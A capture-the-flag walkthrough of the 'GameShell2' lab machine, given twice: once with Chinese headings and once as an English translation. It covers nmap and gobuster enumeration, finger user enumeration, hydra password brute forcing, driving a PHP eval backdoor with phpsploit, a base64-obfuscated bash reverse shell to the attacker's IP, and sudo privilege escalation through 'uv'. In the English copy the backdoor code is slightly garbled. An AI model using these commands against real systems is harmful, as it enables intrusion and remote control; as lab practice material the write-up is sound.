mazesec gameshell2
枚举
# Nmap 7.95 scan initiated Thu Dec 11 07:38:55 2025 as: /usr/lib/nmap/nmap --privileged -T4 --open -Pn -sV -v -oN nmap 192.168.110.17
Nmap scan report for GameShell2.lan (192.168.110.17)
Host is up (0.00019s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
79/tcp open finger OpenBSD fingerd (ported to Linux)
80/tcp open http Apache httpd 2.4.62 ((Debian))
MAC Address: 08:00:27:9A:11:EA (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: Host: GameShell2; OSs: Linux, Linux 4.19.0-27-amd64; CPE: cpe:/o:linux:linux_kernel, cpe:/o:linux:linux_kernel:4.19.0-27-amd64
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Dec 11 07:39:07 2025 -- 1 IP address (1 host up) scanned in 11.96 seconds网站
$ gobuster dir -u http://192.168.110.17 -w /usr/share/wordlists/dirb/common.txt -x txt,php,html,bak
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.110.17
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Extensions: html,bak,txt,php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta.html (Status: 403) [Size: 279]
/.hta.bak (Status: 403) [Size: 279]
/.htaccess.txt (Status: 403) [Size: 279]
/.htaccess (Status: 403) [Size: 279]
/.hta.php (Status: 403) [Size: 279]
/.hta.txt (Status: 403) [Size: 279]
/.hta (Status: 403) [Size: 279]
/.htaccess.php (Status: 403) [Size: 279]
/.htaccess.html (Status: 403) [Size: 279]
/.htpasswd (Status: 403) [Size: 279]
/.htaccess.bak (Status: 403) [Size: 279]
/.htpasswd.txt (Status: 403) [Size: 279]
/.htpasswd.php (Status: 403) [Size: 279]
/.htpasswd.html (Status: 403) [Size: 279]
/.htpasswd.bak (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 14134]
/index.html (Status: 200) [Size: 14134]
/robots.txt (Status: 200) [Size: 35]
/robots.txt (Status: 200) [Size: 35]
/server-status (Status: 403) [Size: 279]
/terminal (Status: 401) [Size: 461]
/users.html (Status: 200) [Size: 2052]wget [http://192.168.110.17/users.html](http://192.168.110.17/users.html)
for user in $(cat valid_users_list.txt); do
result=$(finger $user@192.168.110.17 2>&1 | grep "Login:")
if [ -n "$result" ]; then
echo "找到有效用户: $user"
echo "$result"
break
fi
donehydra -l dt -P /usr/share/wordlists/rockyou.txt -f 192.168.110.17 http-get /terminal
—>dt:purple1
玩完游戏得到dt:0t4tdtlt
发现/var/www还有一个dev,所以可能存在另一个网站
查看/etc/apache2/sites-available/dev.astra.dsz.conf
ffuf得到backdoor.php
python3 phpsploit
hpsploit > set TARGET http://dev.astra.dsz/backdoor.php
phpsploit > exploit
[*] Current backdoor is: <?php @eval($_SERVER['HTTP_PHPSPL01T']); ?>
[*] Sending payload to http://dev.astra.dsz:80/backdoor.php ...
[*] Shell obtained by PHP (127.0.0.1 -> 127.0.0.1)
Connected to Linux server (dev.astra.dsz)
running PHP 8.3.19 on Apache/2.4.62 (Debian)
phpsploit(dev.astra.dsz) > ls
Listing: /var/www/dev
=====================
Mode Owner Group Size Last Modified Name
---- ----- ----- ---- ------------- ----
drwx------ www-data www-data 4K Fri Nov 21 11:49:56 +0000 2025 .
drwxr-xr-x root root 4K Fri Nov 21 08:04:51 +0000 2025 ..
-rw-r--r-- root root 44 Fri Nov 21 08:02:19 +0000 2025 backdoor.php
-rw-r--r-- root root 68 Fri Nov 21 11:49:56 +0000 2025 index.html
phpsploit(dev.astra.dsz) > printf KGJhc2ggPiYgL2Rldi90Y3AvMTkyLjE2OC4xMTAuMTQxLzQ0NDQgMD4mMSkgJg==|base64 -d|bash
[-] Unknown Command: printf (use `run` plugin to run remote command)
[-] Unknown Command: | (use `run` plugin to run remote command)
[-] Unknown Command: base64 (use `run` plugin to run remote command)
[-] Unknown Command: | (use `run` plugin to run remote command)
[-] Unknown Command: bash (use `run` plugin to run remote command)
phpsploit(dev.astra.dsz) > run 'printf KGJhc2ggPiYgL2Rldi90Y3AvMTkyLjE2OC4xMTAuMTQxLzQ0NDQgMD4mMSkgJg==|base64 -d|bash'
phpsploit(dev.astra.dsz) >权限提升
www-data@GameShell2:/var/www$ sudo -l
Matching Defaults entries for www-data on GameShell2:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on GameShell2:
(ALL) NOPASSWD: /usr/local/bin/uv
www-data@GameShell2:/var/www$ sudo /usr/local/bin/uv run /bin/bash
root@GameShell2:/var/www# cat /root/root.txt
flag{root-983b0f2b5412aadd94ed08f249355686}
mazesec gameshell2
Enumeration
# Nmap 7.95 scan started on Thu Dec 11 07:38:55 2025 with the following command:
# /usr/lib/nmap/nmap --privileged -T4 --open -Pn -sV -v -oN nmap 192.168.110.17
Nmap scan report for GameShell2.lan (192.168.110.17):
The host is up (latency: 0.00019 seconds).
997 closed TCP ports were not displayed (they were reset).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 (Debian 5+deb11u3; protocol 2.0)
79/tcp open finger OpenBSD fingerd (ported to Linux)
80/tcp open http Apache httpd 2.4.62 (Debian)
MAC Address: 08:00:27:9A:11:EA (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service information:
Host: GameShell2; Operating Systems: Linux 4.19.0-27-amd64; CPE: cpe:/o:linux:linux_kernel, cpe:/o:linux:linux_kernel:4.19.0-27-amd64
Data files were read from: /usr/share/nmap
Service detection has been completed. Please report any incorrect results at: https://nmap.org/submit/
# Nmap completed on Thu Dec 11 07:39:07 2025; 1 IP address (1 host up) was scanned in 11.96 seconds.Websites
$ gobuster dir -u http://192.168.110.17 -w /usr/share/wordlists/dirb/common.txt -x txt,php,html,bak
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] URL: http://192.168.110.17
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Extensions: html,bak,txt,php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta.html (Status: 403) [Size: 279]
/.hta.bak (Status: 403) [Size: 279]
/.htaccess.txt (Status: 403) [Size: 279]
/.htaccess (Status: 403) [Size: 279]
/.hta.php (Status: 403) [Size: 279]
/.hta.txt (Status: 403) [Size: 279]
/.hta (Status: 403) [Size: 279]
/.htaccess.php (Status: 403) [Size: 279]
/.htaccess.html (Status: 403) [Size: 279]
/.htpasswd (Status: 403) [Size: 279]
/.htaccess.bak (Status: 403) [Size: 279]
/.htpasswd.txt (Status: 403) [Size: 279]
/.htpasswd.php (Status: 403) [Size: 279]
/.htpasswd.html (Status: 403) [Size: 279]
/.htpasswd.bak (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 14134]
/index.html (Status: 200) [Size: 14134]
/robots.txt (Status: 200) [Size: 35]
/robots.txt (Status: 200) [Size: 35]
/server-status (Status: 403) [Size: 279]
/terminal (Status: 401) [Size: 461]
/users.html (Status: 200) [Size: 2052]wget [http://192.168.110.17/users.html](http://192.168.110.17/users.html)
for user in $(cat valid_users_list.txt); do
result=$(finger $user@192.168.110.17 2>&1 | grep "Login:")
if [ -n "$result" ]; then
echo "Found valid user: $user"
echo "$result"
break
fi
donehydra -l dt -P /usr/share/wordlists/rockyou.txt -f 192.168.110.17 http-get /terminal
—> Output: dt:purple1
After completing the game, the result was dt:0t4tdtlt.
It was discovered that there is a file named dev in the /var/www directory, which suggests the existence of another potential website.
The configuration file /etc/apache2/sites-available/dev.astra.dsz.conf was examined.
The file backdoor.php was found using ffuf.
python3 phpsploit
hpsploit > set TARGET http://dev.astra.dsz/backdoor.php
phpsploit > exploit
[*] Current backdoor is: <?php @eval($_SERVER['HTTP_PHPSPL01T']; ?>[] Payload is being sent to http://dev.astra.dsz:80/backdoor.php … [] A shell session was established (from 127.0.0.1 to 127.0.0.1).
Connected to the Linux server (dev.astra.dsz), running PHP 8.3.19 on Apache/2.4.62 (Debian).
phpsploit(dev.astra.dsz) > lsOutput:
Listing of contents in /var/www/dev:
================-----
Mode Owner Group Size Last Modified Name
---- ----- ----- ---- ------------- ----
drwx------ www-data www-data 4K Fri Nov 21 11:49:56 +0000 2025 .
drwxr-xr-x root root 4K Fri Nov 21 08:04:51 +0000 2025 ..
-rw-r--r-- root root 44 Fri Nov 21 08:02:19 +0000 backdoor.php
-rw-r--r-- root root 68 Fri Nov 21 11:49:56 +0000 index.html
phpsploit(dev.astra.dsz) > printf KGJhc2ggPiYgL2Rldi90Y3AvMTkyLjE2OC4xMTAuMTQxLzQ0NDQgMD4mMSkgJg==|base64 -d|bash
[-] Unknown command: “printf”. Use the “run” plugin to execute a remote command.
[-] Unknown command: “|”. Use the “run” plugin to execute a remote command.
[-] Unknown command: “base64”. Use the “run” plugin to execute a remote command.
[-] Unknown command: “|”. Use the “run” plugin to execute a remote command.
[-] Unknown command: “bash”. Use the “run” plugin to execute a remote command.
phpsploit(dev.astra.dsz) > run 'printf KGJhc2ggPiYgL2Rldi90Y3AvMTkyLjE2OC4xMTAuMTQxLzQ0NDQgMD4mMSkgJg==|base64 -d|bash'
phpsploit(dev.astra.dsz) >
# Privilege Escalation
```bash
www-data@GameShell2:/var/www$ sudo -l
Matching Defaults entries for www-data on GameShell2:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on GameShell2:
(ALL) NOPASSWD: /usr/local/bin/uv
www-data@GameShell2:/var/www$ sudo /usr/local/bin/uv run /bin/bash
root@GameShell2:/var/www# cat /root/root.txt
flag{root-983b0f2b5412aadd94ed08f249355686}